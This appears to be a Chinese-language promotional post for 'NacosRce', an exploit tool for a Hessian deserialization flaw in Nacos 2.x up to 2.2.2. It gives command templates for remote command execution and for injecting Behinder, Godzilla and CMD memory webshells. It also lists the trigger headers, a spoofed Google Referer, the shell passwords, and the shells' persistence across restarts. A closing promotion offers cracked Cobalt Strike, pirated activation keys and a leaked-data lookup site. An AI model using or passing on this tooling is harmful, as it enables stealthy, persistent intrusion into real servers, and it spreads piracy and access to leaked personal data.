其他
Nacos Hessian 反序列化漏洞利用工具
开局先放一张图
使用方式
自动注入内存马并执行命令:
模板:
java -jar NacosRce.jar Url Jraft端口 "Command"
示例:
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"
只注入内存马:
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell
冰蝎内存马
1、需要设置请求头x-client-data:rebeyond
2、设置Referer:https://www.google.com/
3、路径随意
4、密码rebeyond
哥斯拉内存马
1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key
CMD内存马
1、需要设置请求头x-client-data:cmd
2、设置Referer:https://www.google.com/
3、请求头cmd:要执行的命令
v0.5
版本实现了:
1、不出网漏洞利用
2、可多次发起漏洞利用
3、同时注入冰蝎/哥斯拉/CMD内存马
4、内存马对nacos多版本进行了兼容
tips:
1、请用jdk1.8
2、适用于 Nacos 2.x <= 2.2.2
3、非集群的也能打哦
4、此内存马重启nacos依然存活
关于Windows
如用下面的方式执行,注入内存马时会生成临时文件 C:\Windows\Temp\nacos_data_temp
和 C:\Windows\Temp\nacos_data_temp.class
文件
java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows
如果没有在最后加 windows
,临时文件会在 /tmp/nacos_data_temp
/tmp/nacos_data_temp.class
,所以权限足够的话,不指定 windows
也能打成功
windows
没打成功也许是因为没权限操作 C盘
或其他原因
项目地址(欢迎Star,0.5版暂时需要自己编译):
https://github.com/c0olw/NacosRce
关注公众号后台回复 0001
领取域渗透思维导图,0002
领取VMware 17永久激活码,0003
获取SGK地址,0004
获取在线ChatGPT地址,0005
获取 Windows10渗透集成环境,0006
获取 CobaltStrike 4.8破解版
加我微信好友,邀请你进交流群
往期推荐
备用号,欢迎关注